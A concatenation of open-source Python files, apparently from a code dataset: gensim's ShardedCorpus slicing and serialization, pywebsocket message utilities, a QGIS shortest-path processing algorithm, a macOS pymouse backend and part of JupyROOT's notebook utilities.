#s_result[result_start:result_stop] = self.current_shard[
# shard_start:shard_stop]
s_result = self.__add_to_slice(s_result, result_start, result_stop,
shard_start, shard_stop)
# First and last get special treatment, these are in between
for shard_n in xrange(first_shard+1, last_shard):
self.load_shard(shard_n)
result_start = result_stop
result_stop += self.shardsize
shard_start = 0
shard_stop = self.shardsize
s_result = self.__add_to_slice(s_result, result_start,
result_stop, shard_start,
shard_stop)
# Last shard
self.load_shard(last_shard)
result_start = result_stop
result_stop += stop - self.current_offset
shard_start = 0
shard_stop = stop - self.current_offset
s_result = self.__add_to_slice(s_result, result_start, result_stop,
shard_start, shard_stop)
s_result = self._getitem_format(s_result)
return s_result
else:
s_result = self.get_by_offset(offset)
s_result = self._getitem_format(s_result)
return s_result
def __add_to_slice(self, s_result, result_start, result_stop, start, stop):
"""
Add the rows of the current shard from `start` to `stop`
into rows `result_start` to `result_stop` of `s_result`.
Operation is based on the self.sparse_serialize setting. If the shard
contents are dense, then s_result is assumed to be an ndarray that
already supports row indices `result_start:result_stop`. If the shard
contents are sparse, assumes that s_result has `result_start` rows
and we should add them up to `result_stop`.
Returns the resulting s_result.
"""
if (result_stop - result_start) != (stop - start):
            raise ValueError('Result start/stop range different than stop/start '
                             'range ({0} - {1} vs. {2} - {3})'.format(result_start,
                                                                      result_stop,
                                                                      start, stop))
# Dense data: just copy using numpy's slice notation
if not self.sparse_serialization:
s_result[result_start:result_stop] = self.current_shard[start:stop]
return s_result
# A bit more difficult, we're using a different structure to build the
# result.
else:
if s_result.shape != (result_start, self.dim):
                raise ValueError('Assumption about sparse s_result shape '
'invalid: {0} expected rows, {1} real '
'rows.'.format(result_start,
s_result.shape[0]))
tmp_matrix = self.current_shard[start:stop]
s_result = sparse.vstack([s_result, tmp_matrix])
return s_result
def _getitem_format(self, s_result):
if self.sparse_serialization:
if self.gensim:
s_result = self._getitem_sparse2gensim(s_result)
elif not self.sparse_retrieval:
s_result = numpy.array(s_result.todense())
else:
if self.gensim:
s_result = self._getitem_dense2gensim(s_result)
elif self.sparse_retrieval:
s_result = sparse.csr_matrix(s_result)
return s_result
def _getitem_sparse2gensim(self, result):
"""
Change given sparse result matrix to gensim sparse vectors.
Uses the internals of the sparse matrix to make this fast.
"""
def row_sparse2gensim(row_idx, csr_matrix):
indices = csr_matrix.indices[csr_matrix.indptr[row_idx]:csr_matrix.indptr[row_idx+1]]
g_row = [(col_idx, csr_matrix[row_idx, col_idx]) for col_idx in indices]
return g_row
output = (row_sparse2gensim(i, result) for i in xrange(result.shape[0]))
return output
def _getitem_dense2gensim(self, result):
"""Change given dense result matrix to gensim sparse vectors."""
if len(result.shape) == 1:
output = gensim.matutils.full2sparse(result)
else:
output = (gensim.matutils.full2sparse(result[i])
for i in xrange(result.shape[0]))
return output
# Overriding the IndexedCorpus and other corpus superclass methods
def __iter__(self):
"""
Yield dataset items one by one (generator).
"""
for i in xrange(len(self)):
yield self[i]
def save(self, *args, **kwargs):
"""
Save itself (the wrapper) in clean state (after calling `reset()`)
to the output_prefix file. If you wish to save to a different file,
use the `fname` argument as the first positional arg.
"""
# Can we save to a different file than output_prefix? Well, why not?
if len(args) == 0:
args = tuple([self.output_prefix])
attrs_to_ignore = ['current_shard',
'current_shard_n',
'current_offset']
if 'ignore' not in kwargs:
kwargs['ignore'] = frozenset(attrs_to_ignore)
else:
kwargs['ignore'] = frozenset([v for v in kwargs['ignore']]
+ attrs_to_ignore)
super(ShardedCorpus, self).save(*args, **kwargs)
#
# self.reset()
# with smart_open(self.output_prefix, 'wb') as pickle_handle:
# cPickle.dump(self, pickle_handle)
@classmethod
def load(cls, fname, mmap=None):
"""
Load itself in clean state. `mmap` has no effect here.
"""
return super(ShardedCorpus, cls).load(fname, mmap)
@staticmethod
def save_corpus(fname, corpus, id2word=None, progress_cnt=1000,
metadata=False, **kwargs):
"""
Implement a serialization interface. Do not call directly;
use the `serialize` method instead.
Note that you might need some ShardedCorpus init parameters, most
likely the dimension (`dim`). Again, pass these as `kwargs` to the
`serialize` method.
All this thing does is initialize a ShardedCorpus from a corpus
with the `output_prefix` argument set to the `fname` parameter
of this method. The initialization of a ShardedCorpus takes care of
serializing the data (in dense form) to shards.
Ignore the parameters id2word, progress_cnt and metadata. They
currently do nothing and are here only to provide a compatible
method signature with superclass.
"""
ShardedCorpus(fname, corpus, **kwargs)
@classmethod
def serialize(serializer, fname, corpus, id2word=None,
index_fname=None, progress_cnt=None, labels=None,
metadata=False, **kwargs):
"""
Iterate through the document stream `corpus`, saving the documents
as a ShardedCorpus to `fname`.
Use this method instead of calling `save_corpus` directly.
You may need to supply some kwargs that are used upon dataset creation
(namely: `dim`, unless the dataset can infer the dimension from the
given corpus).
Ignore the parameters id2word, index_fname, progress_cnt, labels
and metadata. They currently do nothing and are here only to
provide a compatible method signature with superclass."""
serializer.save_corpus(fname, corpus, id2word=id2word,
progress_cnt=progress_cnt, metadata=metadata,
**kwargs)
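# A minimal end-to-end sketch, assuming a scratch output prefix and the
# gensim.utils.mock_data() helper mentioned in the class docstring above.
def _example_sharded_corpus_roundtrip(output_prefix='/tmp/mock_corpus.shdat'):
    corpus = gensim.utils.mock_data()           # small random bag-of-words corpus
    ShardedCorpus.serialize(output_prefix, corpus, dim=1000, shardsize=256)
    sh_corpus = ShardedCorpus.load(output_prefix)
    dense_batch = sh_corpus[10:20]              # numpy ndarray, shape (10, 1000)
    sh_corpus.gensim = True
    gensim_batch = list(sh_corpus[10:20])       # gensim-style sparse vectors
    sh_corpus.gensim = False
    sh_corpus.resize_shards(512)                # re-serialize into larger shards
    return dense_batch.shape, len(gensim_batch)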
| gpl-3.0 | 306,182,225,580,232,000 | 40.387972 | 100 | 0.588455 | false |
zmike/servo | tests/wpt/css-tests/tools/pywebsocket/src/mod_pywebsocket/msgutil.py | 658 | 7598 | # Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Message related utilities.
Note: request.connection.write/read are used in this module, even though
mod_python document says that they should be used only in connection
handlers. Unfortunately, we have no other options. For example,
request.write/read are not suitable because they don't allow direct raw
bytes writing/reading.
"""
import Queue
import threading
# Export Exception symbols from msgutil for backward compatibility
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import UnsupportedFrameException
# An API for handler to send/receive WebSocket messages.
def close_connection(request):
"""Close connection.
Args:
request: mod_python request.
"""
request.ws_stream.close_connection()
def send_message(request, payload_data, end=True, binary=False):
"""Send a message (or part of a message).
Args:
request: mod_python request.
payload_data: unicode text or str binary to send.
end: True to terminate a message.
False to send payload_data as part of a message that is to be
terminated by next or later send_message call with end=True.
binary: send payload_data as binary frame(s).
Raises:
        BadOperationException: when the server has already terminated.
"""
request.ws_stream.send_message(payload_data, end, binary)
def receive_message(request):
"""Receive a WebSocket frame and return its payload as a text in
unicode or a binary in str.
Args:
request: mod_python request.
Raises:
        InvalidFrameException: when the client sends an invalid frame.
        UnsupportedFrameException: when the client sends an unsupported frame,
                                   e.g. some reserved bit is set but no
                                   extension can recognize it.
        InvalidUTF8Exception: when the client sends a text frame containing an
                              invalid UTF-8 string.
        ConnectionTerminatedException: when the connection is closed
                                       unexpectedly.
        BadOperationException: when the client connection has already been
                               terminated.
"""
return request.ws_stream.receive_message()
def send_ping(request, body=''):
request.ws_stream.send_ping(body)
class MessageReceiver(threading.Thread):
"""This class receives messages from the client.
This class provides three ways to receive messages: blocking,
non-blocking, and via callback. Callback has the highest precedence.
Note: This class should not be used with the standalone server for wss
because pyOpenSSL used by the server raises a fatal error if the socket
is accessed from multiple threads.
"""
def __init__(self, request, onmessage=None):
"""Construct an instance.
Args:
request: mod_python request.
onmessage: a function to be called when a message is received.
May be None. If not None, the function is called on
another thread. In that case, MessageReceiver.receive
and MessageReceiver.receive_nowait are useless
because they will never return any messages.
"""
threading.Thread.__init__(self)
self._request = request
self._queue = Queue.Queue()
self._onmessage = onmessage
self._stop_requested = False
self.setDaemon(True)
self.start()
def run(self):
try:
while not self._stop_requested:
message = receive_message(self._request)
if self._onmessage:
self._onmessage(message)
else:
self._queue.put(message)
finally:
close_connection(self._request)
def receive(self):
""" Receive a message from the channel, blocking.
Returns:
message as a unicode string.
"""
return self._queue.get()
def receive_nowait(self):
""" Receive a message from the channel, non-blocking.
Returns:
message as a unicode string if available. None otherwise.
"""
try:
message = self._queue.get_nowait()
except Queue.Empty:
message = None
return message
def stop(self):
"""Request to stop this instance.
The instance will be stopped after receiving the next message.
This method may not be very useful, but there is no clean way
in Python to forcefully stop a running thread.
"""
self._stop_requested = True
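# A minimal sketch of callback-mode usage, assuming it runs inside a handler's
# web_socket_transfer_data(request); the echo behaviour is illustrative only.
def _example_echo_with_receiver(request):
    def on_message(message):
        send_message(request, message)      # echo every received frame back
    receiver = MessageReceiver(request, onmessage=on_message)
    # ... do other work; when finished, ask the receiver to wind down.
    receiver.stop()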
class MessageSender(threading.Thread):
"""This class sends messages to the client.
This class provides both synchronous and asynchronous ways to send
messages.
Note: This class should not be used with the standalone server for wss
because pyOpenSSL used by the server raises a fatal error if the socket
is accessed from multiple threads.
"""
def __init__(self, request):
"""Construct an instance.
Args:
request: mod_python request.
"""
threading.Thread.__init__(self)
self._request = request
self._queue = Queue.Queue()
self.setDaemon(True)
self.start()
def run(self):
while True:
message, condition = self._queue.get()
condition.acquire()
send_message(self._request, message)
condition.notify()
condition.release()
def send(self, message):
"""Send a message, blocking."""
condition = threading.Condition()
condition.acquire()
self._queue.put((message, condition))
condition.wait()
def send_nowait(self, message):
"""Send a message, non-blocking."""
self._queue.put((message, threading.Condition()))
# vi:sts=4 sw=4 et
| mpl-2.0 | -1,855,365,556,284,930,600 | 33.694064 | 79 | 0.661227 | false |
gioman/QGIS | python/plugins/processing/algs/qgis/ShortestPathPointToLayer.py | 1 | 11506 | # -*- coding: utf-8 -*-
"""
***************************************************************************
ShortestPathPointToLayer.py
---------------------
Date : December 2016
Copyright : (C) 2016 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'December 2016'
__copyright__ = '(C) 2016, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from collections import OrderedDict
from qgis.PyQt.QtCore import QVariant
from qgis.PyQt.QtGui import QIcon
from qgis.core import (QgsWkbTypes, QgsUnitTypes, QgsFeature, QgsGeometry, QgsPoint, QgsFields, QgsField, QgsFeatureRequest,
QgsMessageLog,
QgsProcessingUtils)
from qgis.analysis import (QgsVectorLayerDirector,
QgsNetworkDistanceStrategy,
QgsNetworkSpeedStrategy,
QgsGraphBuilder,
QgsGraphAnalyzer
)
from qgis.utils import iface
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import (ParameterVector,
ParameterPoint,
ParameterNumber,
ParameterString,
ParameterTableField,
ParameterSelection
)
from processing.core.outputs import OutputVector
from processing.tools import dataobjects
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class ShortestPathPointToLayer(GeoAlgorithm):
INPUT_VECTOR = 'INPUT_VECTOR'
START_POINT = 'START_POINT'
END_POINTS = 'END_POINTS'
STRATEGY = 'STRATEGY'
DIRECTION_FIELD = 'DIRECTION_FIELD'
VALUE_FORWARD = 'VALUE_FORWARD'
VALUE_BACKWARD = 'VALUE_BACKWARD'
VALUE_BOTH = 'VALUE_BOTH'
DEFAULT_DIRECTION = 'DEFAULT_DIRECTION'
SPEED_FIELD = 'SPEED_FIELD'
DEFAULT_SPEED = 'DEFAULT_SPEED'
TOLERANCE = 'TOLERANCE'
OUTPUT_LAYER = 'OUTPUT_LAYER'
def icon(self):
return QIcon(os.path.join(pluginPath, 'images', 'networkanalysis.svg'))
def group(self):
return self.tr('Network analysis')
def name(self):
return 'shortestpathpointtolayer'
def displayName(self):
return self.tr('Shortest path (point to layer)')
def defineCharacteristics(self):
self.DIRECTIONS = OrderedDict([
(self.tr('Forward direction'), QgsVectorLayerDirector.DirectionForward),
            (self.tr('Backward direction'), QgsVectorLayerDirector.DirectionBackward),
            (self.tr('Both directions'), QgsVectorLayerDirector.DirectionBoth)])
self.STRATEGIES = [self.tr('Shortest'),
self.tr('Fastest')
]
self.addParameter(ParameterVector(self.INPUT_VECTOR,
self.tr('Vector layer representing network'),
[dataobjects.TYPE_VECTOR_LINE]))
self.addParameter(ParameterPoint(self.START_POINT,
self.tr('Start point')))
self.addParameter(ParameterVector(self.END_POINTS,
self.tr('Vector layer with end points'),
[dataobjects.TYPE_VECTOR_POINT]))
self.addParameter(ParameterSelection(self.STRATEGY,
self.tr('Path type to calculate'),
self.STRATEGIES,
default=0))
params = []
params.append(ParameterTableField(self.DIRECTION_FIELD,
self.tr('Direction field'),
self.INPUT_VECTOR,
optional=True))
params.append(ParameterString(self.VALUE_FORWARD,
self.tr('Value for forward direction'),
'',
optional=True))
params.append(ParameterString(self.VALUE_BACKWARD,
self.tr('Value for backward direction'),
'',
optional=True))
params.append(ParameterString(self.VALUE_BOTH,
self.tr('Value for both directions'),
'',
optional=True))
params.append(ParameterSelection(self.DEFAULT_DIRECTION,
self.tr('Default direction'),
list(self.DIRECTIONS.keys()),
default=2))
params.append(ParameterTableField(self.SPEED_FIELD,
self.tr('Speed field'),
self.INPUT_VECTOR,
optional=True))
params.append(ParameterNumber(self.DEFAULT_SPEED,
self.tr('Default speed (km/h)'),
0.0, 99999999.999999, 5.0))
params.append(ParameterNumber(self.TOLERANCE,
self.tr('Topology tolerance'),
0.0, 99999999.999999, 0.0))
for p in params:
p.isAdvanced = True
self.addParameter(p)
self.addOutput(OutputVector(self.OUTPUT_LAYER,
self.tr('Shortest path'),
datatype=[dataobjects.TYPE_VECTOR_LINE]))
def processAlgorithm(self, context, feedback):
layer = QgsProcessingUtils.mapLayerFromString(self.getParameterValue(self.INPUT_VECTOR), context)
startPoint = self.getParameterValue(self.START_POINT)
endPoints = QgsProcessingUtils.mapLayerFromString(self.getParameterValue(self.END_POINTS), context)
strategy = self.getParameterValue(self.STRATEGY)
directionFieldName = self.getParameterValue(self.DIRECTION_FIELD)
forwardValue = self.getParameterValue(self.VALUE_FORWARD)
backwardValue = self.getParameterValue(self.VALUE_BACKWARD)
bothValue = self.getParameterValue(self.VALUE_BOTH)
defaultDirection = self.getParameterValue(self.DEFAULT_DIRECTION)
speedFieldName = self.getParameterValue(self.SPEED_FIELD)
defaultSpeed = self.getParameterValue(self.DEFAULT_SPEED)
tolerance = self.getParameterValue(self.TOLERANCE)
fields = QgsFields()
fields.append(QgsField('start', QVariant.String, '', 254, 0))
fields.append(QgsField('end', QVariant.String, '', 254, 0))
fields.append(QgsField('cost', QVariant.Double, '', 20, 7))
feat = QgsFeature()
feat.setFields(fields)
writer = self.getOutputFromName(
self.OUTPUT_LAYER).getVectorWriter(fields, QgsWkbTypes.LineString, layer.crs(), context)
tmp = startPoint.split(',')
startPoint = QgsPoint(float(tmp[0]), float(tmp[1]))
directionField = -1
if directionFieldName is not None:
directionField = layer.fields().lookupField(directionFieldName)
speedField = -1
if speedFieldName is not None:
speedField = layer.fields().lookupField(speedFieldName)
director = QgsVectorLayerDirector(layer,
directionField,
forwardValue,
backwardValue,
bothValue,
defaultDirection)
distUnit = iface.mapCanvas().mapSettings().destinationCrs().mapUnits()
multiplier = QgsUnitTypes.fromUnitToUnitFactor(distUnit, QgsUnitTypes.DistanceMeters)
if strategy == 0:
strategy = QgsNetworkDistanceStrategy()
else:
strategy = QgsNetworkSpeedStrategy(speedField,
defaultSpeed,
multiplier * 1000.0 / 3600.0)
multiplier = 3600
director.addStrategy(strategy)
builder = QgsGraphBuilder(iface.mapCanvas().mapSettings().destinationCrs(),
True,
tolerance)
feedback.pushInfo(self.tr('Loading end points...'))
request = QgsFeatureRequest()
request.setFlags(request.flags() ^ QgsFeatureRequest.SubsetOfAttributes)
features = QgsProcessingUtils.getFeatures(endPoints, context, request)
count = QgsProcessingUtils.featureCount(endPoints, context)
points = [startPoint]
for f in features:
points.append(f.geometry().asPoint())
feedback.pushInfo(self.tr('Building graph...'))
snappedPoints = director.makeGraph(builder, points)
feedback.pushInfo(self.tr('Calculating shortest paths...'))
graph = builder.graph()
idxStart = graph.findVertex(snappedPoints[0])
tree, cost = QgsGraphAnalyzer.dijkstra(graph, idxStart, 0)
route = []
total = 100.0 / count
for i in range(1, count + 1):
idxEnd = graph.findVertex(snappedPoints[i])
if tree[idxEnd] == -1:
msg = self.tr('There is no route from start point ({}) to end point ({}).'.format(startPoint.toString(), points[i].toString()))
feedback.setProgressText(msg)
QgsMessageLog.logMessage(msg, self.tr('Processing'), QgsMessageLog.WARNING)
continue
cost = 0.0
current = idxEnd
while current != idxStart:
cost += graph.edge(tree[current]).cost(0)
route.append(graph.vertex(graph.edge(tree[current]).inVertex()).point())
current = graph.edge(tree[current]).outVertex()
route.append(snappedPoints[0])
route.reverse()
geom = QgsGeometry.fromPolyline(route)
feat.setGeometry(geom)
feat['start'] = startPoint.toString()
feat['end'] = points[i].toString()
feat['cost'] = cost / multiplier
writer.addFeature(feat)
route[:] = []
feedback.setProgress(int(i * total))
del writer
| gpl-2.0 | -3,578,964,556,221,195,300 | 43.084291 | 143 | 0.526595 | false |
CamelBackNotation/hackdfw | Dependencies/build/lib.linux-x86_64-2.7/pymouse/mac.py | 10 | 5547 | #Copyright 2013 Paul Barton
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
import Quartz
from AppKit import NSEvent, NSScreen
from .base import PyMouseMeta, PyMouseEventMeta
pressID = [None, Quartz.kCGEventLeftMouseDown,
Quartz.kCGEventRightMouseDown, Quartz.kCGEventOtherMouseDown]
releaseID = [None, Quartz.kCGEventLeftMouseUp,
Quartz.kCGEventRightMouseUp, Quartz.kCGEventOtherMouseUp]
class PyMouse(PyMouseMeta):
def press(self, x, y, button=1):
event = Quartz.CGEventCreateMouseEvent(None,
pressID[button],
(x, y),
button - 1)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, event)
def release(self, x, y, button=1):
event = Quartz.CGEventCreateMouseEvent(None,
releaseID[button],
(x, y),
button - 1)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, event)
def move(self, x, y):
move = Quartz.CGEventCreateMouseEvent(None, Quartz.kCGEventMouseMoved, (x, y), 0)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, move)
def drag(self, x, y):
drag = Quartz.CGEventCreateMouseEvent(None, Quartz.kCGEventLeftMouseDragged, (x, y), 0)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, drag)
def position(self):
loc = NSEvent.mouseLocation()
return loc.x, Quartz.CGDisplayPixelsHigh(0) - loc.y
def screen_size(self):
return NSScreen.mainScreen().frame().size.width, NSScreen.mainScreen().frame().size.height
def scroll(self, vertical=None, horizontal=None, depth=None):
#Local submethod for generating Mac scroll events in one axis at a time
def scroll_event(y_move=0, x_move=0, z_move=0, n=1):
for _ in range(abs(n)):
scrollWheelEvent = Quartz.CGEventCreateScrollWheelEvent(
None, # No source
Quartz.kCGScrollEventUnitLine, # Unit of measurement is lines
3, # Number of wheels(dimensions)
y_move,
x_move,
z_move)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, scrollWheelEvent)
#Execute vertical then horizontal then depth scrolling events
if vertical is not None:
vertical = int(vertical)
if vertical == 0: # Do nothing with 0 distance
pass
elif vertical > 0: # Scroll up if positive
scroll_event(y_move=1, n=vertical)
else: # Scroll down if negative
scroll_event(y_move=-1, n=abs(vertical))
if horizontal is not None:
horizontal = int(horizontal)
if horizontal == 0: # Do nothing with 0 distance
pass
elif horizontal > 0: # Scroll right if positive
scroll_event(x_move=1, n=horizontal)
else: # Scroll left if negative
scroll_event(x_move=-1, n=abs(horizontal))
if depth is not None:
depth = int(depth)
if depth == 0: # Do nothing with 0 distance
pass
            elif depth > 0:  # Scroll "out" if positive
scroll_event(z_move=1, n=depth)
else: # Scroll "in" if negative
scroll_event(z_move=-1, n=abs(depth))
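# A minimal driving sketch for the backend above: a click is a press followed
# by a release at the same coordinates, and scroll() takes signed line counts.
def _example_click_and_scroll():
    mouse = PyMouse()
    width, height = mouse.screen_size()
    x, y = int(width / 2), int(height / 2)
    mouse.move(x, y)
    mouse.press(x, y, button=1)
    mouse.release(x, y, button=1)
    mouse.scroll(vertical=-3, horizontal=0)   # three lines down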
class PyMouseEvent(PyMouseEventMeta):
def run(self):
tap = Quartz.CGEventTapCreate(
Quartz.kCGSessionEventTap,
Quartz.kCGHeadInsertEventTap,
Quartz.kCGEventTapOptionDefault,
Quartz.CGEventMaskBit(Quartz.kCGEventMouseMoved) |
Quartz.CGEventMaskBit(Quartz.kCGEventLeftMouseDown) |
Quartz.CGEventMaskBit(Quartz.kCGEventLeftMouseUp) |
Quartz.CGEventMaskBit(Quartz.kCGEventRightMouseDown) |
Quartz.CGEventMaskBit(Quartz.kCGEventRightMouseUp) |
Quartz.CGEventMaskBit(Quartz.kCGEventOtherMouseDown) |
Quartz.CGEventMaskBit(Quartz.kCGEventOtherMouseUp),
self.handler,
None)
loopsource = Quartz.CFMachPortCreateRunLoopSource(None, tap, 0)
loop = Quartz.CFRunLoopGetCurrent()
Quartz.CFRunLoopAddSource(loop, loopsource, Quartz.kCFRunLoopDefaultMode)
Quartz.CGEventTapEnable(tap, True)
while self.state:
Quartz.CFRunLoopRunInMode(Quartz.kCFRunLoopDefaultMode, 5, False)
def handler(self, proxy, type, event, refcon):
(x, y) = Quartz.CGEventGetLocation(event)
if type in pressID:
self.click(x, y, pressID.index(type), True)
elif type in releaseID:
self.click(x, y, releaseID.index(type), False)
else:
self.move(x, y)
if self.capture:
Quartz.CGEventSetType(event, Quartz.kCGEventNull)
return event
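# Illustrative sketch (not part of the original module): PyMouseEvent is meant
# to be subclassed. The handler above forwards events to click()/move(), which
# are assumed here to be the overridable hooks provided by PyMouseEventMeta.
class _ExamplePyMouseEventLogger(PyMouseEvent):
    def click(self, x, y, button, press):
        self.last_click = (x, y, button, press)   # record the click event
    def move(self, x, y):
        self.last_move = (x, y)                   # record the move event
# Calling _ExamplePyMouseEventLogger().run() would start delivering events.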
| mit | -1,704,382,213,220,390,000 | 40.706767 | 98 | 0.614026 | false |
BerserkerTroll/root | bindings/pyroot/JupyROOT/utils.py | 6 | 14510 | # -*- coding:utf-8 -*-
#-----------------------------------------------------------------------------
# Author: Danilo Piparo <[email protected]> CERN
#-----------------------------------------------------------------------------
from __future__ import print_function
import os
import sys
import select
import tempfile
import pty
import itertools
import re
import fnmatch
import time
from hashlib import sha1
from contextlib import contextmanager
from subprocess import check_output
from IPython import get_ipython
from IPython.display import HTML
from IPython.core.extensions import ExtensionManager
import IPython.display
import ROOT
from JupyROOT import handlers
# We want iPython to take over the graphics
ROOT.gROOT.SetBatch()
cppMIME = 'text/x-c++src'
_jsMagicHighlight = """
Jupyter.CodeCell.options_default.highlight_modes['magic_{cppMIME}'] = {{'reg':[/^%%cpp/]}};
console.log("JupyROOT - %%cpp magic configured");
"""
_jsNotDrawableClassesPatterns = ["TGraph[23]D","TH3*","TGraphPolar","TProf*","TEve*","TF[23]","TGeo*","TPolyLine3D", "TH2Poly"]
_jsROOTSourceDir = "https://root.cern.ch/js/notebook/"
_jsCanvasWidth = 800
_jsCanvasHeight = 600
_jsCode = """
<div id="{jsDivId}"
style="width: {jsCanvasWidth}px; height: {jsCanvasHeight}px">
</div>
<script>
requirejs.config({{
paths: {{
'JSRootCore' : '{jsROOTSourceDir}/scripts/JSRootCore',
}}
}});
require(['JSRootCore'],
function(Core) {{
var obj = Core.JSONR_unref({jsonContent});
Core.draw("{jsDivId}", obj, "{jsDrawOptions}");
}}
);
</script>
"""
TBufferJSONErrorMessage="The TBufferJSON class is necessary for JS visualisation to work and cannot be found. Did you enable the http module (-D http=ON for CMake)?"
def TBufferJSONAvailable():
if hasattr(ROOT,"TBufferJSON"):
return True
print(TBufferJSONErrorMessage, file=sys.stderr)
return False
_enableJSVis = False
_enableJSVisDebug = False
def enableJSVis():
if not TBufferJSONAvailable():
return
global _enableJSVis
_enableJSVis = True
def disableJSVis():
global _enableJSVis
_enableJSVis = False
def enableJSVisDebug():
if not TBufferJSONAvailable():
return
global _enableJSVis
global _enableJSVisDebug
_enableJSVis = True
_enableJSVisDebug = True
def disableJSVisDebug():
global _enableJSVis
global _enableJSVisDebug
_enableJSVis = False
_enableJSVisDebug = False
def _getPlatform():
return sys.platform
def _getLibExtension(thePlatform):
'''Return appropriate file extension for a shared library
>>> _getLibExtension('darwin')
'.dylib'
>>> _getLibExtension('win32')
'.dll'
>>> _getLibExtension('OddPlatform')
'.so'
'''
pExtMap = {
'darwin' : '.dylib',
'win32' : '.dll'
}
return pExtMap.get(thePlatform, '.so')
def welcomeMsg():
print("Welcome to JupyROOT %s" %ROOT.gROOT.GetVersion())
@contextmanager
def _setIgnoreLevel(level):
originalLevel = ROOT.gErrorIgnoreLevel
ROOT.gErrorIgnoreLevel = level
yield
ROOT.gErrorIgnoreLevel = originalLevel
def commentRemover( text ):
'''
>>> s="// hello"
>>> commentRemover(s)
''
>>> s="int /** Test **/ main() {return 0;}"
>>> commentRemover(s)
'int main() {return 0;}'
'''
def blotOutNonNewlines( strIn ) : # Return a string containing only the newline chars contained in strIn
return "" + ("\n" * strIn.count('\n'))
def replacer( match ) :
s = match.group(0)
if s.startswith('/'): # Matched string is //...EOL or /*...*/ ==> Blot out all non-newline chars
return blotOutNonNewlines(s)
else: # Matched string is '...' or "..." ==> Keep unchanged
return s
pattern = re.compile(\
r'//.*?$|/\*.*?\*/|\'(?:\\.|[^\\\'])*\'|"(?:\\.|[^\\"])*"',
re.DOTALL | re.MULTILINE)
return re.sub(pattern, replacer, text)
# Here functions are defined to process C++ code
def processCppCodeImpl(code):
#code = commentRemover(code)
ROOT.gInterpreter.ProcessLine(code)
def processMagicCppCodeImpl(code):
err = ROOT.ProcessLineWrapper(code)
if err == ROOT.TInterpreter.kProcessing:
ROOT.gInterpreter.ProcessLine('.@')
ROOT.gInterpreter.ProcessLine('cerr << "Unbalanced braces. This cell was not processed." << endl;')
def declareCppCodeImpl(code):
#code = commentRemover(code)
ROOT.gInterpreter.Declare(code)
def processCppCode(code):
processCppCodeImpl(code)
def processMagicCppCode(code):
processMagicCppCodeImpl(code)
def declareCppCode(code):
declareCppCodeImpl(code)
def _checkOutput(command,errMsg=None):
out = ""
try:
out = check_output(command.split())
except:
if errMsg:
sys.stderr.write("%s (command was %s)\n" %(errMsg,command))
return out
def _invokeAclicMac(fileName):
'''FIXME!
This function is a workaround. On osx, it is impossible to link against
libzmq.so, among the others. The error is known and is
"ld: can't link with bundle (MH_BUNDLE) only dylibs (MH_DYLIB)"
We cannot at the moment force Aclic to change the linker command in order
to exclude these libraries, so we launch a second root session to compile
the library, which we then load.
'''
command = 'root -l -q -b -e gSystem->CompileMacro(\"%s\",\"k\")*0'%fileName
    out = _checkOutput(command, "Error invoking ACLiC")
libNameBase = fileName.replace(".C","_C")
ROOT.gSystem.Load(libNameBase)
def _codeToFilename(code):
'''Convert code to a unique file name
>>> _codeToFilename("int f(i){return i*i;}")
'dbf7e731.C'
'''
fileNameBase = sha1(code.encode('utf-8')).hexdigest()[0:8]
return fileNameBase + ".C"
def _dumpToUniqueFile(code):
'''Dump code to file whose name is unique
    >>> _dumpToUniqueFile("int f(i){return i*i;}")
'dbf7e731.C'
'''
fileName = _codeToFilename(code)
with open (fileName,'w') as ofile:
ofile.write(code)
return fileName
def isPlatformApple():
return _getPlatform() == 'darwin';
def invokeAclic(cell):
fileName = _dumpToUniqueFile(cell)
if isPlatformApple():
_invokeAclicMac(fileName)
else:
